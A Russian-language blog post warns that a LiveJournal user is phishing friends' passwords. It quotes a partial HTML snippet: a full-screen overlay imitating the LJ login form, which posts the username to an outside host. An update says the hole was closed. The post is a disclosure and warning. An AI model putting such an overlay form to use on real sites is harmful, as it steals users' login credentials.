[personal profile] vythe
Оказывается, украсть пароль в ЖЖ очень просто, особенно у своего френда. В собственном посте ставим хтмл примерно такого вида:

   [div class="b-fader" style="top: 0px; left: 0px; width: 100%; height: 100%;"]
      [div class="appwidget appwidget-login"]
         [form action="http://ohtoenequ1.getenjoyment.net/index.php" method="post" class="lj_login_form pkg"]
             [label]Имя пользователя[/label]
             [input type="text" name="user"][/input]

И так далее.

ЖЖ честно отрисовывает это дело поверх френдленты, и ни один антивирус не дёргается - всё законно. А дальше вам предлагается угадать, что это запрос не от ЖЖ, а от вашего френда.

Конкретно сейчас этим невинным фокусом нас радует пользователь helix-a - пожелаем же ему всяческих успехов. И талантливым ЖЖ-программистам, которые дали ему такую возможность - тоже.

Upd. (+3h.) Проблему в ЖЖ довольно быстро "локализовали", т.е. абуз замораживает записи с конкретно этим кодом, а потом разрешает пользователям подавать на возвращение пароля. починили, так что этот метод больше не работает. Но общей талантливости это не отменяет...
This account has disabled anonymous posting.
If you don't have an account you can create one now.
HTML doesn't work in the subject.
More info about formatting

Profile

Vythe

March 2026

S M T W T F S
123456 7
891011121314
15161718192021
22232425262728
293031    

Style Credit

Expand Cut Tags

No cut tags
Page generated Mar. 6th, 2026 05:29 pm
Powered by Dreamwidth Studios